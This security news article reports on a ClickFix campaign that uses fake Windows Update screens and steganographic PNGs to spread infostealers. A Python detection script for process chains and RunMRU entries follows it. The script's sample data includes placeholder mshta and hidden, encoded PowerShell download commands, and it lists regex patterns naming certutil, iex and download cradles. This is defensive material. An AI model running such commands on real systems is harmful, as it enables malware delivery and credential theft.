A new ClickFix campaign uses a fake full-screen Windows Update page and steganographic PNG files to deliver LummaC2 and Rhadamanthys malware through user-executed commands.

The Fake Update Screen That Makes You Install Malware Yourself

The420 Correspondent

A new wave of cyberattacks is tricking Windows users into installing malware through highly realistic, full-screen browser pages that mimic Microsoft’s official update interface, according to researchers who say the campaign marks a significant evolution of a dangerous social-engineering technique known as ClickFix.

The attacks, observed since early October, rely on convincing victims to manually paste attacker-controlled commands into the Windows Command Prompt—a maneuver that bypasses many security controls and gives hackers direct execution capabilities on the system.

A Realistic Update Screen That’s Pure Deception

In this latest iteration, attackers display an animated Windows Update screen that fills the entire browser window, instructing victims to “complete installation” by pressing specific key sequences. JavaScript embedded within the page silently copies malicious code into the user’s clipboard; when the user pastes it into Command Prompt—as instructed—the malware executes.


“With the fake update screen, the attacker blends social engineering and technical execution in a way that’s nearly indistinguishable from a legitimate Windows process,” said researchers at the cybersecurity firm Huntress, which analyzed the campaign.

In another variant, attackers use a “human verification” page that similarly convinces the user to run malicious commands.

Steganography Hides Malware in Images

A key advancement in the new ClickFix wave is the deployment of steganography—encoding the final malware payload inside what appear to be harmless PNG images. Rather than adding data at the end of a file, the malicious code is inserted directly into pixel color channels, where it is later reconstructed in memory.

The steganographic payloads are decrypted using a .NET “Stego Loader” that retrieves an AES-encrypted blob from its own manifest resources. The resulting shellcode is hidden until executed.

Once the payloads were unpacked, researchers found that attackers were delivering two well-known information-stealing tools: LummaC2 and Rhadamanthys, both capable of harvesting browser data, cryptocurrency wallets, authentication tokens and system credentials.

A Multi-Stage Chain Designed for Evasion

The attack chain begins with mshta.exe, a native Windows binary frequently abused for malicious JavaScript execution. Multiple stages follow, involving PowerShell scripts, a custom loader and shellcode reconstructed from the PNG file.

Huntress identified an evasion mechanism called ctrampoline, in which the malware’s entry-point function calls 10,000 empty functions in a chain, making static analysis significantly more difficult for automated scanners.

A visual map published by Huntress shows the attack’s complexity—beginning with a seemingly simple browser prompt and culminating in fully covert in-memory execution.

Infrastructure Impacted by Operation Endgame

Researchers noted that a Windows Update–themed Rhadamanthys campaign was active as recently as early October. However, after Operation Endgame, a multinational law enforcement effort that disrupted several malware distribution networks on November 13, the payloads appear to have stopped being delivered—though the phishing domains remain online.

The lingering infrastructure suggests that operators may be regrouping or preparing to infect new victims once updated payloads are ready.

How Users and Analysts Can Protect Themselves

Experts warn that the new variant is especially effective because it weaponizes trust in familiar system prompts.

Huntress recommends:

  • Disabling the Windows Run dialog for non-technical users

  • Monitoring for explorer.exe → mshta.exe → powershell.exe process chains

  • Reviewing the RunMRU registry key for suspicious user-entered commands

  • Training users to avoid entering commands supplied by unknown websites

  • Treating any full-screen browser “Windows Update” page as suspicious
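The second and third recommendations above (watching for the explorer.exe → mshta.exe → powershell.exe chain, and reviewing RunMRU for user-entered commands) can be turned into a small triage script. The Python below is an added example written for this article; it is not Huntress's tooling or any published detection rule. It runs over constructed sample data: process-creation records modelled on Sysmon Event ID 1 / Windows 4688 fields (pid, parent pid, image path), and a dictionary modelled on the HKCU\...\Explorer\RunMRU values, whose entries end in a literal "\1" suffix. The chain check is parameterised, so it generalises beyond the specific mshta chain named above; the RunMRU patterns (mshta, remote URLs, hidden or encoded PowerShell) are assumptions about what a ClickFix-style command looks like, not indicators taken from the campaign.

```python
"""Triage helpers for ClickFix-style activity (added example, constructed data).

1. find_chains():   flag a parent/child process chain such as
                    explorer.exe -> mshta.exe -> powershell.exe, following
                    ParentProcessId links rather than just matching names.
2. triage_runmru(): flag RunMRU (Win+R history) entries that look like
                    attacker-supplied commands.
"""
import re

# Constructed process-creation events (Sysmon EID 1 / 4688-style fields).
SAMPLE_EVENTS = [
    {"pid": 1000, "ppid": 500,  "image": r"C:\Windows\explorer.exe"},
    {"pid": 2100, "ppid": 1000, "image": r"C:\Windows\System32\mshta.exe"},
    {"pid": 2200, "ppid": 2100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"pid": 3000, "ppid": 1000, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe"},
    {"pid": 3100, "ppid": 1000, "image": r"C:\Windows\System32\cmd.exe"},
    {"pid": 3200, "ppid": 3100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
]

# Constructed RunMRU values. Real entries carry a trailing "\1"; MRUList gives
# most-recent-first order of the lettered slots. URL and payload are placeholders.
SAMPLE_RUNMRU = {
    "a": "notepad\\1",
    "b": "mshta https://update-check.invalid/verify.hta\\1",
    "c": "powershell -w hidden -ep bypass -enc <BASE64-PLACEHOLDER>\\1",
    "d": "calc\\1",
    "MRUList": "cbad",
}

# The chain Huntress recommends monitoring for (oldest ancestor first).
SUSPICIOUS_CHAIN = ("explorer.exe", "mshta.exe", "powershell.exe")

# Assumed heuristics for commands a user would not normally type into Run.
RUNMRU_PATTERNS = [
    r"\bmshta(\.exe)?\b",
    r"\bpowershell(\.exe)?\b.*(-enc|-e\b|-w(indowstyle)?\s+hidden|iex|invoke-expression|irm|invoke-webrequest|downloadstring)",
    r"https?://",
    r"\bcertutil\b.*-urlcache",
    r"\bcurl\b|\bbitsadmin\b",
]


def basename(path):
    """Lower-cased file name from a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_chains(events, chain=SUSPICIOUS_CHAIN):
    """Return (pid, ...) tuples whose ancestry matches `chain` exactly, in order."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if basename(e["image"]) != chain[-1]:
            continue
        # Walk up ParentProcessId links, matching the chain from its last element.
        lineage = [e["pid"]]
        cur = e
        matched = True
        for expected in reversed(chain[:-1]):
            parent = by_pid.get(cur["ppid"])
            if parent is None or basename(parent["image"]) != expected:
                matched = False
                break
            lineage.append(parent["pid"])
            cur = parent
        if matched:
            hits.append(tuple(reversed(lineage)))
    return hits


def triage_runmru(values):
    """Return [(slot, command, matched_patterns)] for suspicious entries, MRU order."""
    flagged = []
    for slot in values.get("MRUList", ""):
        raw = values.get(slot, "")
        cmd = raw[:-2] if raw.endswith("\\1") else raw  # strip the literal "\1" suffix
        matches = [p for p in RUNMRU_PATTERNS if re.search(p, cmd, re.IGNORECASE)]
        if matches:
            flagged.append((slot, cmd, matches))
    return flagged


if __name__ == "__main__":
    for lineage in find_chains(SAMPLE_EVENTS):
        print("suspicious chain (pids):", " -> ".join(map(str, lineage)))
    for slot, cmd, pats in triage_runmru(SAMPLE_RUNMRU):
        print(f"RunMRU slot {slot}: {cmd!r} matched {len(pats)} pattern(s)")
```

On a live host the event list would come from Sysmon or the Security log and the RunMRU dictionary from the user's HKCU hive; the point of following ppid links rather than matching names alone is that an mshta.exe launched by a browser or a scheduled task is a different story from one launched directly by the shell after a user typed a command.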

The attack underscores a broader trend: as operating systems harden their defenses, attackers increasingly rely on social-engineering tricks that make users execute the malware themselves—unknowingly turning human behavior into the weakest link.
